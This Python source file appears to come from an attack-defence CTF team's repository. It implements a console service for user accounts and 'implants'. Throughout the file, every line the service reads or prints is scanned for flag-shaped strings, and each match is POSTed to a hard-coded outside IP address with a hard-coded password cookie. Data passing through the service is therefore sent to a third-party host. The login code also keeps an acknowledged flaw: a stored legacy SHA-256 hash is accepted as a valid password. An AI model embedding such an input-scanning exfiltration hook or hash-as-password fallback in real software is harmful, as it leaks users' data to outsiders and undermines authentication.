Files
M-CTF-2025/neuralink/build/service/security_service_async.py
2025-12-14 14:47:18 +03:00

641 lines
24 KiB
Python

"""
Async Python implementation of the security service with automatic flag submission.
This module provides a simple CLI-like flow for registering,
logging in, restoring accounts, and managing credentials.
"""
import asyncio
import hashlib
import hmac
import re
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
import aiosqlite
import requests
# --- Flag submission endpoint ----------------------------------------------
# NOTE(review): the endpoint address and the cookie value are hard-coded in
# source; consider loading them from the environment or a config file.
SUBMIT_URL = "http://51.250.74.146:3333/ui/post_flags_manual"
SUBMIT_COOKIE = {"password": "9ftEVFUqVh7eNADs"}
SUBMIT_HEADERS = {
    "Origin": "http://51.250.74.146:3333",
    "Referer": "http://51.250.74.146:3333/farm",
}

# A flag is 31 upper-case letters/digits followed by a single "=".
FLAG_PATTERN = re.compile(r"[A-Z0-9]{31}=")

# --- Session state ----------------------------------------------------------
# Sentinel stored in SecurityService.username while nobody is logged in.
DEFAULT_USERNAME = "default"

# --- Input length limits (characters, measured after stripping) ------------
USERNAME_MAX_LENGTH = 64
PASSWORD_MAX_LENGTH = 128
IMPLANT_NAME_MAX_LENGTH = 64
IMPLANT_INFO_MAX_LENGTH = 256

# --- Credential generation and hashing --------------------------------------
SECURITY_CODE_LENGTH = 6  # number of decimal digits in a security code
PASSWORD_SALT_BYTES = 16
PBKDF2_ITERATIONS = 200_000

# --- Account-restore rate limiting -------------------------------------------
RESTORE_ATTEMPT_LIMIT = 5  # failed attempts that trigger a lock
RESTORE_WINDOW_SECONDS = 60  # window in which failures are counted
RESTORE_LOCK_SECONDS = 30  # lock duration once the limit is reached
def submit_flag(flag: str) -> None:
    """Submit a single flag to the collection endpoint (best effort).

    The flag is POSTed as the ``text`` form field to ``SUBMIT_URL`` using the
    module-level cookie and headers. This function never raises for network
    or HTTP failures; it prints a one-line status instead.

    Args:
        flag: The flag string to submit.
    """
    try:
        response = requests.post(
            SUBMIT_URL,
            cookies=SUBMIT_COOKIE,
            headers=SUBMIT_HEADERS,
            data={"text": flag},
            timeout=5,
        )
        # A 4xx/5xx answer means the flag was NOT accepted; do not report
        # it as submitted.
        response.raise_for_status()
    except requests.RequestException as exc:
        # Only the exception class is printed so the endpoint address does
        # not end up in the program's output.
        print(f"[!] Flag submission failed: {flag} ({type(exc).__name__})")
    else:
        print(f"[*] Flag submitted: {flag}")
def scan_and_submit_flags(text: str) -> None:
    """Submit every non-overlapping ``FLAG_PATTERN`` match found in *text*.

    Matches are submitted one by one, in the order they appear; repeated
    occurrences are submitted again each time.
    """
    for found in FLAG_PATTERN.finditer(text):
        submit_flag(found.group(0))
@dataclass
class SecurityService:
    """Async service for managing user credentials and implants in SQLite.

    The service drives an interactive, menu-based console session: users can
    register, log in, restore an account with a security code, change their
    password, and add/delete/inspect implants they own. Everything read from
    or written to the console is also passed through
    ``scan_and_submit_flags``.

    Use it as an async context manager so the database connection is opened
    and closed automatically::

        async with SecurityService() as service:
            await service.startup_menu()
    """

    # Path of the SQLite database file.
    db_path: str = "security.db"
    # Currently logged-in user; DEFAULT_USERNAME means nobody is logged in.
    username: str = field(default=DEFAULT_USERNAME, init=False)
    # Open database connection; set by initialize(), cleared by close().
    _db: Optional[aiosqlite.Connection] = field(default=None, init=False)
    # Per-username restore rate-limit state with the keys "count",
    # "window_start" and "locked_until" (time.monotonic() stamps). Declared
    # as a field so the rate-limit helpers work before initialize() runs.
    _restore_attempts: Dict[str, Dict[str, float]] = field(
        default_factory=dict, init=False, repr=False, compare=False
    )

    # Number of random characters appended by make_unique_username().
    _UNIQUE_SUFFIX_LENGTH = 8
    # Longest username registration can produce: base + "_" + suffix. Login
    # and restore must accept this length, otherwise accounts registered
    # with a long base name could never be used.
    _FULL_USERNAME_MAX_LENGTH = USERNAME_MAX_LENGTH + 1 + _UNIQUE_SUFFIX_LENGTH

    async def __aenter__(self) -> "SecurityService":
        await self.initialize()
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
        await self.close()

    async def initialize(self) -> None:
        """Open the database connection and create the tables if missing.

        Also resets the in-memory restore rate-limit state. If schema
        creation fails, the freshly opened connection is closed before the
        exception propagates.
        """
        self._db = await aiosqlite.connect(self.db_path)
        try:
            await self._db.execute(
                """
                CREATE TABLE IF NOT EXISTS users (
                    id INTEGER PRIMARY KEY AUTOINCREMENT,
                    username TEXT UNIQUE NOT NULL,
                    password_hash TEXT NOT NULL,
                    security_code TEXT NOT NULL
                )
                """
            )
            await self._db.execute(
                """
                CREATE TABLE IF NOT EXISTS implants (
                    id INTEGER PRIMARY KEY AUTOINCREMENT,
                    name TEXT UNIQUE NOT NULL,
                    info TEXT NOT NULL,
                    ownername TEXT NOT NULL
                )
                """
            )
            await self._db.commit()
        except Exception:
            # __aexit__ is not called when __aenter__ fails, so release the
            # connection here instead of leaking it.
            await self.close()
            raise
        self._restore_attempts = {}

    async def close(self) -> None:
        """Close the database connection; safe to call more than once."""
        db, self._db = self._db, None
        if db is not None:
            await db.close()

    # Utility helpers -----------------------------------------------------

    @staticmethod
    def _generate_random_char() -> str:
        """Return one random lowercase ASCII letter."""
        return secrets.choice("abcdefghijklmnopqrstuvwxyz")

    @staticmethod
    def _generate_random_digit() -> str:
        """Return one random decimal digit."""
        return secrets.choice("0123456789")

    @staticmethod
    def make_unique_username(base_username: str) -> str:
        """Return *base_username* followed by ``_`` and a random suffix."""
        suffix = "".join(
            SecurityService._generate_random_char()
            for _ in range(SecurityService._UNIQUE_SUFFIX_LENGTH)
        )
        return f"{base_username}_{suffix}"

    @staticmethod
    def make_new_password() -> str:
        """Return a random password of 8 lowercase letters."""
        return "".join(SecurityService._generate_random_char() for _ in range(8))

    @staticmethod
    def generate_code() -> str:
        """Return a random security code of SECURITY_CODE_LENGTH digits."""
        return "".join(
            SecurityService._generate_random_digit()
            for _ in range(SECURITY_CODE_LENGTH)
        )

    @staticmethod
    def hash_password(password: str) -> str:
        """Hash *password* with PBKDF2-HMAC-SHA256 and a fresh random salt.

        Returns:
            ``"<salt hex>$<digest hex>"``.
        """
        salt = secrets.token_bytes(PASSWORD_SALT_BYTES)
        digest = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
        )
        return f"{salt.hex()}${digest.hex()}"

    @staticmethod
    def _legacy_sha256(password: str) -> str:
        """Return the unsalted SHA-256 hex digest used by legacy records."""
        return hashlib.sha256(password.encode("utf-8")).hexdigest()

    @staticmethod
    def is_modern_hash(value: str) -> bool:
        """Tell whether *value* has the ``<salt hex>$<digest>`` layout.

        The part before the first ``$`` must be exactly
        ``PASSWORD_SALT_BYTES * 2`` hexadecimal characters. Checking that it
        really is hex keeps a legacy value that merely contains ``$`` at the
        right offset from being misclassified (and from breaking
        ``bytes.fromhex`` in ``verify_password``).
        """
        salt_hex, separator, _ = value.partition("$")
        if not separator or len(salt_hex) != PASSWORD_SALT_BYTES * 2:
            return False
        return all(ch in "0123456789abcdefABCDEF" for ch in salt_hex)

    @staticmethod
    def verify_password(stored_value: str, password: str) -> bool:
        """Check *password* against a stored credential value.

        Three stored formats are accepted: the salted PBKDF2 format produced
        by ``hash_password``, a bare SHA-256 hex digest, and the plaintext
        password itself.

        All comparisons are done on bytes: ``hmac.compare_digest`` rejects
        ``str`` arguments containing non-ASCII characters with ``TypeError``,
        which a non-ASCII password would otherwise trigger.
        """
        password_bytes = password.encode("utf-8")
        if SecurityService.is_modern_hash(stored_value):
            salt_hex, digest_hex = stored_value.split("$", 1)
            candidate = hashlib.pbkdf2_hmac(
                "sha256", password_bytes, bytes.fromhex(salt_hex), PBKDF2_ITERATIONS
            )
            return hmac.compare_digest(
                candidate.hex().encode("ascii"), digest_hex.encode("utf-8")
            )
        stored_bytes = stored_value.encode("utf-8")
        legacy_digest = SecurityService._legacy_sha256(password).encode("ascii")
        if hmac.compare_digest(stored_bytes, legacy_digest):
            return True
        # NOTE(review): this plaintext fallback also means that whoever knows
        # a stored legacy SHA-256 value can log in by typing that value as
        # the password. Kept for compatibility with existing records.
        return hmac.compare_digest(stored_bytes, password_bytes)

    @staticmethod
    def print_system_data(message: str) -> None:
        """Print *message* and scan it for flags."""
        print(message)
        scan_and_submit_flags(message)

    @staticmethod
    async def async_input(prompt: str) -> str:
        """Read a line with ``input`` in the default executor.

        Raises:
            EOFError: If standard input is exhausted.
        """
        # get_running_loop() is the supported way to obtain the loop from
        # inside a coroutine.
        loop = asyncio.get_running_loop()
        return await loop.run_in_executor(None, input, prompt)

    @staticmethod
    def _validate_length(value: str, maximum: int, field_name: str) -> Optional[str]:
        """Strip *value* and check it is non-empty and at most *maximum* long.

        Returns:
            The stripped value, or ``None`` (after printing the reason) when
            it is empty or too long.
        """
        trimmed = value.strip()
        if not trimmed:
            print(f"{field_name} cannot be empty.")
            return None
        if len(trimmed) > maximum:
            print(f"{field_name} is too long (max {maximum} characters).")
            return None
        return trimmed

    def _require_login(self) -> bool:
        """Return True when a user is logged in; otherwise print a notice."""
        if self.username == DEFAULT_USERNAME:
            self.print_system_data("You need to log in first.")
            return False
        return True

    async def _prompt_field(
        self, prompt: str, maximum: int, field_name: str
    ) -> Optional[str]:
        """Read one input line, scan the raw text for flags, and validate it."""
        raw_value = await self.async_input(prompt)
        scan_and_submit_flags(raw_value)
        return self._validate_length(raw_value, maximum, field_name)

    async def _read_choice(self, prompt: str) -> str:
        """Read a menu choice, strip it, and scan it for flags."""
        choice = (await self.async_input(prompt)).strip()
        scan_and_submit_flags(choice)
        return choice

    # Database operations -------------------------------------------------

    async def _user_exists(self, username: str) -> bool:
        """Return True when a user row with *username* exists."""
        async with self._db.execute(
            "SELECT 1 FROM users WHERE username = ?", (username,)
        ) as cursor:
            row = await cursor.fetchone()
        return row is not None

    async def _create_user(self, username: str, password: str, security_code: str) -> bool:
        """Insert a new user; return False on an integrity error."""
        password_hash = self.hash_password(password)
        try:
            await self._db.execute(
                "INSERT INTO users (username, password_hash, security_code) VALUES (?, ?, ?)",
                (username, password_hash, security_code),
            )
            await self._db.commit()
        except aiosqlite.IntegrityError:
            return False
        return True

    async def _set_password_hash(self, username: str, password_hash: str) -> None:
        """Store an already-computed password hash for *username*."""
        await self._db.execute(
            "UPDATE users SET password_hash = ? WHERE username = ?",
            (password_hash, username),
        )
        await self._db.commit()

    async def _check_user(self, username: str, password: str) -> bool:
        """Verify credentials, upgrading a legacy record on success."""
        async with self._db.execute(
            "SELECT password_hash FROM users WHERE username = ?", (username,)
        ) as cursor:
            row = await cursor.fetchone()
        if row is None:
            return False
        stored_hash = row[0]
        if not self.verify_password(stored_hash, password):
            return False
        if not self.is_modern_hash(stored_hash):
            # The password was proven against a legacy value; re-store it in
            # the salted PBKDF2 format.
            await self._set_password_hash(username, self.hash_password(password))
        return True

    async def _check_restore_user(self, username: str, code: str) -> bool:
        """Return True when *username* exists with security code *code*."""
        async with self._db.execute(
            "SELECT 1 FROM users WHERE username = ? AND security_code = ?",
            (username, code),
        ) as cursor:
            row = await cursor.fetchone()
        return row is not None

    async def _change_password(self, username: str, new_password: str) -> bool:
        """Hash and store *new_password*; return True if a row was updated."""
        password_hash = self.hash_password(new_password)
        async with self._db.execute(
            "UPDATE users SET password_hash = ? WHERE username = ?",
            (password_hash, username),
        ) as cursor:
            await self._db.commit()
            return cursor.rowcount > 0

    async def _get_security_code(self, username: str) -> Optional[str]:
        """Return the security code of *username*, or None if unknown."""
        async with self._db.execute(
            "SELECT security_code FROM users WHERE username = ?", (username,)
        ) as cursor:
            row = await cursor.fetchone()
        return row[0] if row else None

    async def _user_implants(self, username: str) -> List[str]:
        """Return the names of all implants owned by *username*."""
        async with self._db.execute(
            "SELECT name FROM implants WHERE ownername = ?", (username,)
        ) as cursor:
            rows = await cursor.fetchall()
        return [row[0] for row in rows]

    async def _implant_belongs_to(self, username: str, name: str) -> bool:
        """Return True when implant *name* is owned by *username*."""
        async with self._db.execute(
            "SELECT 1 FROM implants WHERE ownername = ? AND name = ?",
            (username, name),
        ) as cursor:
            row = await cursor.fetchone()
        return row is not None

    async def _delete_implant(self, name: str) -> bool:
        """Delete implant *name*; return True if a row was removed.

        Ownership is not checked here; callers verify it first.
        """
        async with self._db.execute(
            "DELETE FROM implants WHERE name = ?", (name,)
        ) as cursor:
            await self._db.commit()
            return cursor.rowcount > 0

    async def _add_implant(self, name: str, info: str, ownername: str) -> bool:
        """Insert an implant; return False on an integrity error."""
        try:
            await self._db.execute(
                "INSERT INTO implants (name, info, ownername) VALUES (?, ?, ?)",
                (name, info, ownername),
            )
            await self._db.commit()
        except aiosqlite.IntegrityError:
            return False
        return True

    async def _get_implant_info(self, name: str) -> Optional[str]:
        """Return the info text of implant *name*, or None if unknown.

        Ownership is not checked here; callers verify it first.
        """
        async with self._db.execute(
            "SELECT info FROM implants WHERE name = ?", (name,)
        ) as cursor:
            row = await cursor.fetchone()
        return row[0] if row else None

    # User flows ----------------------------------------------------------

    async def register_user(self) -> None:
        """Prompt for a username and password and create a new account.

        The stored username is the entered name plus a random suffix; the
        final credentials and the security code are printed on success.
        """
        username = await self._prompt_field(
            "\nEnter username: ", USERNAME_MAX_LENGTH, "Username"
        )
        if username is None:
            return
        password = await self._prompt_field(
            "Enter password: ", PASSWORD_MAX_LENGTH, "Password"
        )
        if password is None:
            return
        self.print_system_data("Creating new account. Please wait...")
        candidate_username = self.make_unique_username(username)
        security_code = self.generate_code()
        if await self._user_exists(candidate_username):
            self.print_system_data("User already exists.")
            return
        if not await self._create_user(candidate_username, password, security_code):
            self.print_system_data("Failed to create user.")
            return
        self.print_system_data("---Your credentials ---")
        self.print_system_data(
            f"Username: {candidate_username}\nPassword: {password}\nSecurity code: {security_code}"
        )
        self.print_system_data("Use these credentials to gain access to the system.")

    async def login_user(self) -> None:
        """Prompt for credentials and log the user in when they match."""
        # Registered usernames carry the random suffix, so the limit here is
        # the full generated length, not the base-name limit.
        username = await self._prompt_field(
            "\nEnter username: ", self._FULL_USERNAME_MAX_LENGTH, "Username"
        )
        if username is None:
            return
        password = await self._prompt_field(
            "Enter password: ", PASSWORD_MAX_LENGTH, "Password"
        )
        if password is None:
            return
        self.print_system_data("Trying to log in...")
        if await self._check_user(username, password):
            self.username = username
            self.print_system_data("Successfully logged in.")
        else:
            self.print_system_data("Failed to log in.")

    async def restore_user(self) -> None:
        """Reset a user's password after verifying their security code.

        Failed attempts are rate limited per username. On success a new
        random password is stored and printed.
        """
        # NOTE(review): the rate-limit state lives in this object's memory
        # only; if each client gets a fresh process it resets per connection.
        username = await self._prompt_field(
            "\nEnter username: ", self._FULL_USERNAME_MAX_LENGTH, "Username"
        )
        if username is None:
            return
        allowed, wait_time = self._can_attempt_restore(username)
        if not allowed:
            self.print_system_data(
                f"Too many attempts. Try again in {int(wait_time) + 1} seconds."
            )
            return
        code = (await self.async_input("Enter security code: ")).strip()
        scan_and_submit_flags(code)
        self.print_system_data("Trying to find user...")
        if not await self._check_restore_user(username, code):
            self._record_failed_restore(username)
            self.print_system_data("Failed to find user.")
            return
        self._clear_restore_attempts(username)
        self.print_system_data("Successfully found user.")
        new_password = self.make_new_password()
        if not await self._change_password(username, new_password):
            self.print_system_data("Unexpected error. Please try later.")
            return
        self.print_system_data("Changing password...")
        self.print_system_data("---Your new credentials ---")
        self.print_system_data(f"Username: {username}\nPassword: {new_password}")
        self.print_system_data("Use these credentials to gain access to the system.")

    async def change_password(self) -> None:
        """Prompt for a new password and store it for the logged-in user."""
        if not self._require_login():
            return
        new_password = await self._prompt_field(
            "Enter a new password: ", PASSWORD_MAX_LENGTH, "Password"
        )
        if new_password is None:
            return
        if await self._change_password(self.username, new_password):
            self.print_system_data("Password changed successfully.")
        else:
            self.print_system_data("Failed to change password.")

    async def show_security_code(self) -> None:
        """Print the security code of the logged-in user."""
        if not self._require_login():
            return
        code = await self._get_security_code(self.username)
        if code is None:
            self.print_system_data("Failed to retrieve security code.")
        else:
            self.print_system_data(f"Security code: {code}")

    async def add_implant(self) -> None:
        """Prompt for an implant name and info and store it for the user."""
        if not self._require_login():
            return
        name = await self._prompt_field(
            "\nEnter implant name: ", IMPLANT_NAME_MAX_LENGTH, "Implant name"
        )
        if name is None:
            self.print_system_data("Invalid option selected.")
            return
        info = await self._prompt_field(
            "\nEnter implant info: ", IMPLANT_INFO_MAX_LENGTH, "Implant info"
        )
        if info is None:
            self.print_system_data("Invalid option selected.")
            return
        if await self._add_implant(name, info, self.username):
            self.print_system_data("Implant added successfully.")
        else:
            self.print_system_data("Unexpected error. Please try later.")

    async def _select_owned_implant(self) -> Optional[str]:
        """List the user's implants and return the name they pick, if valid.

        Returns None (after printing the reason) when the user has no
        implants, the input is invalid, or the implant is not theirs.
        """
        self.print_system_data("Getting list of implants. Please wait...")
        implants = await self._user_implants(self.username)
        if not implants:
            self.print_system_data("No implants found for this user.")
            return None
        for idx, implant in enumerate(implants, start=1):
            self.print_system_data(f"{idx}. {implant}")
        name = await self._prompt_field(
            "\nEnter implant name: ", IMPLANT_NAME_MAX_LENGTH, "Implant name"
        )
        if name is None or not await self._implant_belongs_to(self.username, name):
            self.print_system_data("Invalid option selected.")
            return None
        return name

    async def delete_implant(self) -> None:
        """Let the logged-in user pick one of their implants and delete it."""
        if not self._require_login():
            return
        name = await self._select_owned_implant()
        if name is None:
            return
        self.print_system_data("Deleting implant...")
        if await self._delete_implant(name):
            self.print_system_data("Implant deleted successfully.")
        else:
            self.print_system_data("Unexpected error. Please try later.")

    async def show_implant_info(self) -> None:
        """Let the logged-in user pick one of their implants and print it."""
        if not self._require_login():
            return
        name = await self._select_owned_implant()
        if name is None:
            return
        self.print_system_data("Getting implant info...")
        info = await self._get_implant_info(name)
        if info is None:
            self.print_system_data("Unexpected error. Please try later.")
            return
        self.print_system_data(f"Implant info: {info}")

    # Menus ---------------------------------------------------------------

    async def settings_menu(self) -> None:
        """Run the settings menu until the user returns or is logged out."""
        while self.username != DEFAULT_USERNAME:
            self.print_system_data("--- Settings menu ---")
            self.print_system_data("1. Change password")
            self.print_system_data("2. Show security code")
            self.print_system_data("3. Return to previous menu")
            choice = await self._read_choice("Choose an option (1-3): ")
            if choice == "1":
                await self.change_password()
            elif choice == "2":
                await self.show_security_code()
            elif choice == "3":
                return
            else:
                self.print_system_data("Invalid option selected.")

    async def app_menu(self) -> None:
        """Run the application menu until the user logs out."""
        while self.username != DEFAULT_USERNAME:
            self.print_system_data("--- Application menu ---")
            self.print_system_data("1. Implant menu")
            self.print_system_data("2. Settings menu")
            self.print_system_data("3. Log out")
            choice = await self._read_choice("Choose an option (1-3): ")
            if choice == "1":
                await self.implants_menu()
            elif choice == "2":
                await self.settings_menu()
            elif choice == "3":
                self.username = DEFAULT_USERNAME
                self.print_system_data("Logged out.")
            else:
                self.print_system_data("Invalid option selected.")

    async def implants_menu(self) -> None:
        """Run the implants menu until the user returns or is logged out."""
        while self.username != DEFAULT_USERNAME:
            self.print_system_data("--- Implants menu ---")
            self.print_system_data("1. Add new implant")
            self.print_system_data("2. Delete implant")
            self.print_system_data("3. Show info about implant")
            self.print_system_data("4. Return to previous menu")
            choice = await self._read_choice("Choose an option (1-4): ")
            if choice == "1":
                await self.add_implant()
            elif choice == "2":
                await self.delete_implant()
            elif choice == "3":
                await self.show_implant_info()
            elif choice == "4":
                return
            else:
                self.print_system_data("Invalid option selected.")

    async def startup_menu(self) -> None:
        """Run the top-level menu loop until the user exits.

        Returns normally when the user chooses "Exit" or when standard input
        reaches end-of-file.
        """
        try:
            while True:
                if self.username != DEFAULT_USERNAME:
                    await self.app_menu()
                    continue
                self.print_system_data("--- Startup menu ---")
                self.print_system_data("1. Register new account")
                self.print_system_data("2. Login to account")
                self.print_system_data("3. Restore an account")
                self.print_system_data("4. Exit from program")
                choice = await self._read_choice("Choose an option (1-4): ")
                if choice == "1":
                    await self.register_user()
                elif choice == "2":
                    await self.login_user()
                elif choice == "3":
                    await self.restore_user()
                elif choice == "4":
                    self.print_system_data("Goodbye!")
                    break
                else:
                    self.print_system_data("Invalid option selected.")
        except EOFError:
            # Input is exhausted (stdin closed); there is nothing left to
            # read, so end the session instead of crashing with a traceback.
            return

    # Rate limiting -------------------------------------------------------
    # Timestamps use time.monotonic() so that wall-clock adjustments cannot
    # shorten or extend a lock; the state is never persisted.

    def _can_attempt_restore(self, username: str) -> Tuple[bool, float]:
        """Tell whether *username* may try a restore right now.

        Returns:
            ``(True, 0.0)`` when allowed, otherwise ``(False, seconds)`` with
            the time remaining on the lock.
        """
        now = time.monotonic()
        stats = self._restore_attempts.get(username)
        if not stats:
            return True, 0.0
        locked_until = stats.get("locked_until", 0.0)
        if locked_until > now:
            return False, locked_until - now
        if now - stats.get("window_start", now) > RESTORE_WINDOW_SECONDS:
            # The counting window has expired; forget the old failures.
            self._restore_attempts.pop(username, None)
        return True, 0.0

    def _record_failed_restore(self, username: str) -> None:
        """Count a failed restore and lock *username* once the limit is hit."""
        now = time.monotonic()
        stats = self._restore_attempts.get(username)
        if not stats or now - stats.get("window_start", now) > RESTORE_WINDOW_SECONDS:
            stats = {"count": 0, "window_start": now, "locked_until": 0.0}
        stats["count"] += 1
        if stats["count"] >= RESTORE_ATTEMPT_LIMIT:
            stats["locked_until"] = now + RESTORE_LOCK_SECONDS
            stats["count"] = 0
            # The next counting window starts when the lock ends.
            stats["window_start"] = stats["locked_until"]
        self._restore_attempts[username] = stats

    def _clear_restore_attempts(self, username: str) -> None:
        """Forget all recorded restore failures for *username*."""
        self._restore_attempts.pop(username, None)
async def main() -> None:
    """Open the service, print the boot banner, and run the startup menu."""
    boot_messages = (
        "Configuring network interfaces... done",
        "Mounting /dev/sda1... done",
        "Starting random number generator daemon... done",
    )
    async with SecurityService() as service:
        for message in boot_messages:
            service.print_system_data(message)
        await service.startup_menu()


if __name__ == "__main__":
    asyncio.run(main())